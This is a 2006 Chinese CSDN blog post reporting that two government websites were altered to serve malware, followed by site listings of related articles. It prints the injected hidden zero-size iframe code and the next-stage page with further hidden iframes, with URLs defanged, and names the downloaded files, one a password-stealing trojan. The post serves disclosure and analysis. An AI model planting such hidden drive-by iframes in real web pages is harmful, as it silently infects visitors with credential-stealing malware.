两个下载恶意程序文件的政府网站换花样了

最新推荐文章于 2024-11-05 15:26:40 发布
最新推荐文章于 2024-11-05 15:26:40 发布
阅读量3.0k 收藏
点赞数
分类专栏: 原创作品 系统安全 系统维护 文章标签: iframe javascript border
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpleendurer/article/details/1105433
版权

endurer 原创

2006-08-22 第1

今天又看了看 两个会自动下载恶意程序文件的政府网站 一文中的两个网站,发现换了花样。

两个网站首页末均被加入:

/---------
<iframe src="hxxp://www.wzx***qy.com/" width="0" height="0" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>
---------/

hxxp://www.wzx***qy.com/ 的代码为:
/---------
<script language="javascript" src="hxxp://count1***0.51yes.com/click.aspx?id=106674545&logo=8"></script>
<iframe src=hxxp://www.wzx***qy.com/2**/index.htm width=0 height=0></iframe>
<iframe src=hxxp://www.wzx***qy.com/1**/index.htm width=0 height=0></iframe>
<iframe src=hxxp://www.wzx***qy.com/3**/index.htm width=0 height=0></iframe>
---------/

分别下载恶意文件:

qq.exe
zhengtu.exe(Kaspersky 报为 Trojan-PSW.Win32.Delf.ob
jianghu.exe

紫郢剑侠
关注
专栏目录
python中的异常、模块、文件
dreamer_hahaha
07-24 8454
异常 在程序开发中,如果对某些代码的执行不确定(程序的语法完全正确) 可以增加try来捕获异常 try: 尝试执行的代码 except: 出现错误的处理 例如: try: num = int(raw_input('请输入一个整数: ')) except: print '请输入正确的整数' # 无论是否输入错误额,程序都会正常得执行 print '...
近5年典型的的APT攻击事件
煮酒闲谈
08-08 2万+
APT攻击 APT攻击是近几年来出现的一种高级攻击,具有难检测、持续时间长和攻击目标明确等特征。 本文中,整理了近年来比较典型的几个APT攻击,并其攻击过程做了分析 (为了加深自己对APT攻击的理解和学习) Google极光攻击 2010年的Google Aurora(极光)攻击是一个十分著名的APT攻击。Google的一名雇员点击即时消息中的一条恶意链接,引发了一系列事件导致这个搜
又一个下载恶意文件政府网站
Purpleendurer@CSDN
08-22 3319
endurer 原创2006-08-22 第1版 首页有3处地方被加入:/--------<iframe height=0 width=0 src="hxxp://***object.cnic**b.com/15"></iframe>--------/hxxp://***object.cnic**b.com/15   的内容为插入许多空格的JavaScript脚本,利用 Microso
异常网络连接-可疑WebShell通信行为提示的解决办法
weixin_34067049的博客
10-27 2312
2018年10月27日接到新客户网站服务器被上传了webshell脚本木马后门问题的求助,对此我们sine安全公司针对此阿里云提示的安全问题进行了详细分析,ECS服务器被阿里云提示异常网络连接-可疑WebShell通信行为,还会伴有,网站后门-发现后门(Webshell)文件,以及提示网站后门-一句话webshell的安全提示,但是大部分都是单独服务器E...
阿里云紧急安全事件:访问恶意下载。被挖矿了。
weixin_43979716的博客
09-29 1130
https://www.cnblogs.com/chbyiming-bky/articles/12654338.html https://www.cnblogs.com/cpl9412290130/p/11592803.html https://blog.csdn.net/Playerunknown/article/details/104839541
阿里云服务器中挖矿木马处理过程
小灵通的专栏
01-18 1万+
在阿里云租用一台服务器,最近发现被异地登陆,紧接着出现异常下载。登陆服务器,发现CPU达100%,并且安骑士提示有挖矿进程。因为对linux系统不是很熟悉,故而边找资料边处理实验,最后记录下来以便日后处理备查。首先登陆服务器,使用top命令查看进程:CPU飙到100%,按CPU消耗排序,排在第一的是一个名为“imWBR1”的进程,查了一下是一个挖矿木马,首先比较直观的是imWBR1这个进程,查找它
处理服务器挖矿木马
weialemon
01-10 4641
挖矿木马潜伏在服务器上,可能每一个木马名称都不一样,但是大致基本一样。   由于我之前处理时候并没有保留图片,所以此文章依据别的文章所做整理。   杀wnTKYg病毒分两步,第一是找到它的来,切断入口,第二步,找到它的守护进程并杀死,然后再去杀死病毒进程,有的守护进程很隐蔽,唤醒病毒之后,自动消亡,这时候top就看不到了,要留心。 类似于这样,cpu达到百分之百了,这样的进程杀都杀不掉
掌握P5级Java面试技巧
Java程序员廖志伟
03-25 3万+
HashMap底层原理,扩容机制,jdk8以后会使用红黑树优化?红黑树和二叉平衡树的区别,红黑树和B树,B+树的区别,Mysql二大引擎索引底层实现,HashMap在多线程环境中为何出错?ConcurrentHashMap底层实现,CAS,原子引用,ABA问题,volatile,如何解决HashMap出现的OOM问题?(WeakHashMap) HashMap是Map的一个实现类,它是以键值对存储数据的,Key-Value都是Map.Entry中的属性。当我们向HashMap中存放一个元素(k1,v1)
AV(反病毒)技术的演进与规律思索观后感
ClearLove的博客
08-09 2660
AV(反病毒)技术的演进与规律思索观后感        首先老师给我们讲述了病毒的表现形式:计算机病毒是人为的编制的一种寄生性的计算机程序。它的危害主要表现为占用系统资和破坏数据,具有寄生性、传染性、隐蔽性、潜伏性和破坏性。计算机病毒可按良性和恶性分,良性病毒是指只表现自己而不进行破坏的病毒。恶性病毒是指其目的在于人为的破坏计算机的数据、文档或删除硬盘上保存的全部文件。计算机病毒可以按系统型分...
seo相关文章
luofengdong的专栏
03-01 3万+
<br />SEO 网址:http://blog.myspace.cn/xmmei/category/41652.aspx<br /><br /><br /> 五个等级SEOer的特征分析<br />  顶尖的SEOer:<br /><br /> 他们几乎不写博客、不回帖、不参与互联网的争论,每天专心耕耘自己的网站,赚钱很低调,生活很滋润。新浪的SEO不知道哪位负责的,我一直想认识一 下,感觉他是顶尖的。另外听说有某SEOer搞英文站做外贸,公司每月营业额好几百万但只有30几个员工,前台小姐的工资都在
盘点 | 2020年网络新技术及人工智能在网络安全领域的特点
热门推荐
02-21 20万+
回顾2019年,网络新技术新应用继续在网络安全领域大施拳脚,其中人工智能、区块链、量子信息技术对网络安全的两面性影响随着技术的发展呈现出新的特点;第五代移动通信技术(5G)、物联网、边缘计算与雾计算等技术应用在为人类社会带来新一轮科技革命和产业变革的同时,其中蕴涵的网络安全风险也对我们的生产生活产生重大影响。 一、人工智能赋能网络安全防御加速落地,应用引发网络安全风险与现实危害 2019年,人工智能迎来发展黄金期。与2018年相比,人工智能在提升全球网络安全能力方面扮演的“引擎”角色开始发挥实际作用,伴随.
阿里云提示服务器进程异常行为-访问恶意下载
没有解答思路的博客
12-22 4016
最近公司的服务器(阿里云)一直给老板发信息说,服务器在访问恶意下载。老板一开始没在意,后来一天一条短信,然后让我处理一下。作为一个后端工程师,普通的服务器维护在小公司基本都是自己上手来。废话太多了,下面具体描述一下我遇到问题的和解决方法,以便大家遇到了之后不知所措。(大佬们,不吝指教~) 一。问题描述 阿里云服务器警告截图: 阿里云提示服务器访问恶意下载(****.init.sh) 看这种警告...
[700]阿里云提示服务器访问恶意下载
周小董
11-19 3356
最近公司的服务器(阿里云)一直给老板发信息说,服务器在访问恶意下载。老板一开始没在意,后来一天一条短信,然后让我处理一下。作为一个后端工程师,普通的服务器维护在小公司基本都是自己上手来。废话太多了,下面具体描述一下我遇到问题的和解决方法,以便大家遇到了之后不知所措。(大佬们,不吝指教~) 一. 问题描述 阿里云服务器警告截图: 看这种警告,其实主要看几个重点 父进程路径:/usr/sbin/...
JavaScript 生成二维码
qq_30049249的博客
11-02 231
我试过了,这一款js库支持中英文混合。进入网站后,可以直接点击运行哟~
软件测试学习笔记丨Vue常用指令-条件渲染(v-if)
最新发布
ceshiren_com的博客
11-05 483
v-show只是简单控制dom元素的display属性。v-if通过操纵dom元素来进行切显示。
C语言Linux程序:合并两个文件到第三个
在Linux环境下,这个C语言程序(mymerge.c)旨在实现一个实用的功能:将两个输入文件的内容合并并保存到第三个指定的输出文件中。该程序通过标准输入参数来接收两个待合并的文件名(如text1和text2),并将结果写入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值